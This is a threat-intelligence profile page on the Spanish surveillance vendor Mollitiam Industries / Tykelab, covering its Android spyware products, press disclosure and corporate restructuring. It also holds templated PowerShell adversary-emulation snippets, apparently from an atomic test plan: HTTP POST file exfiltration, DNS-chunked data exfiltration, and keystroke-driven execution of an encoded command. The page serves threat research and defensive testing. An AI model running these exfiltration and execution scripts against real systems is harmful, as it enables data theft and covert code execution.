mollitiam_tykelab · threatengine.sh

Mollitiam Industries

mollitiam_tykelab · spain · active since 2018-01

Mollitiam Industries S.L. / Tykelab S.L. is a Spanish commercial surveillance vendor (PSOA) that develops the Invisible Man and Real Fighter Android mobile surveillance platforms for government law enforcement and intelligence clients.

the company was publicly disclosed by Spanish newspaper EL PAIS (February 2022) via leaked product catalogues documenting comprehensive Android surveillance capabilities (location, microphone, camera, multi-platform message interception, anti-forensics icon suppression); Citizen Lab subsequently documented the Mollitiam-to-Tykelab corporate restructuring and command-and-control infrastructure fingerprints.

examined by the European Parliament PEGA Committee (2022-2023) in the context of Spanish surveillance vendor ecosystem governance.

thin public technical documentation relative to NSO Group / Intellexa / Paragon PSOA peers; curated for European PSOA market completeness alongside Variston (variston_heliconia.yaml) and Cy4Gate (cy4gate.yaml).

spain confidence: medium 11 aliases

Sigma rules14 YARA rules0 Live IOCs0 CVEs exploited0

Mollitiam Industries S.L. / Tykelab S.L. is a Spanish private sector offensive actor (PSOA), a commercial mobile surveillance vendor that develops and markets the Invisible Man and Real Fighter Android surveillance platforms to government law enforcement and intelligence clients. The company came to public attention through an investigative disclosure by the Spanish newspaper EL PAIS (February 2022), one of the first public exposures of a Spanish-origin commercial surveillance vendor operating in the government-exclusive lawful-interception market. Mollitiam occupies a smaller market position in the commercial surveillance vendor ecosystem than major PSOA peers (NSO Group Pegasus, Intellexa Predator, Paragon Graphite) but represents a documented European PSOA market participant with reported government client operations. The company's Invisible Man platform marketed capabilities including comprehensive Android device surveillance (location tracking, microphone activation, camera activation, multi-platform message interception, SMS, WhatsApp, Telegram, Signal, iMessage), anti-forensics features (icon suppression, self-deletion, low-battery-footprint design), and claimed iOS surveillance capability. The company has not publicly disclosed its client list or deployment jurisdictions.

the geographic marketing targets documented in leaked product catalogues include Latin American and Middle Eastern government agencies in addition to European law enforcement clients. The corporate continuity between Mollitiam Industries S.L. and Tykelab S.L.

, documented in Citizen Lab's technical analysis following the EL PAIS disclosure, suggests a corporate restructuring or rebranding consistent with the PSOA industry pattern of regulatory-pressure-driven entity reorganization (similar to Hacking Team

RCS Lab and Cytrox / Intellexa corporate evolutions documented elsewhere in this corpus). The exact nature and completeness of the Mollitiam-to-Tykelab corporate transition remains partially opaque in public reporting. This actor entry is curated as a "thin-documentation" entry relative to flagship PSOA entries in this corpus, the public technical disclosure record for Mollitiam / Tykelab is significantly less dense than for NSO Group, Intellexa, Paragon Solutions, Cy4Gate, or RCS Lab. The entry is structurally significant for PSOA ecosystem completeness (providing coverage of the Spanish commercial surveillance market alongside Variston, curated at variston_heliconia.yaml) and governance analysis (European PSOA regulatory framework context) rather than for deep technical tradecraft analysis. Analysts requiring technical depth on Spanish PSOA tradecraft should prioritize the Variston / Heliconia entry (variston_heliconia.yaml) and for overall PSOA ecosystem context the NSO Group (nso_group_pegasus.yaml), Intellexa (intellexa_predator.yaml), and Cy4Gate (cy4gate.yaml) entries.

if(-not (Test-Path #{filepath})){ 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." } } [System.Net.ServicePointManager]::Expect100Continue = $false $filecontent = Get-Content -Path #{filepath} Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive

$dnsServer = "#{dns_server}" $exfiltratedData = "#{exfiltrated_data}" $chunkSize = #{chunk_size} $encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData) $encodedData = [Convert]::ToBase64String($encodedData) $chunks = $encodedData -split "(.{$chunkSize})" foreach ($chunk in $chunks) { $dnsQuery = $chunk + "." + $dnsServer Resolve-DnsName -Name $dnsQuery Start-Sleep -Seconds 5 }

# Add user32.dll for keybd_event Add-Type @" using System; using System.Runtime.InteropServices; public class K { [DllImport("user32.dll")] public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, UIntPtr dwExtraInfo); } "@ # Virtual key codes $VK_LWIN, $VK_R, $KEYDOWN, $KEYUP = 0x5B, 0x52, 0x0000, 0x0002 # Open Run dialog (Win+R) [K]::keybd_event($VK_LWIN, 0, $KEYDOWN, [UIntPtr]::Zero) [K]::keybd_event($VK_R, 0, $KEYDOWN, [UIntPtr]::Zero) [K]::keybd_event($VK_R, 0, $KEYUP, [UIntPtr]::Zero) [K]::keybd_event($VK_LWIN, 0, $KEYUP, [UIntPtr]::Zero) # Short delay for Run dialog Start-Sleep -Milliseconds 500 Add-Type -AssemblyName System.Windows.Forms [System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec " + [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('#{execution_command}')) + "{ENTER}")

Mollitiam Industries

Profile

Aliases

Notable Campaigns

Attribution & Reporting

Operational

Techniques Used

Detection Blind Spots

Atomic Test Plan

Tools Used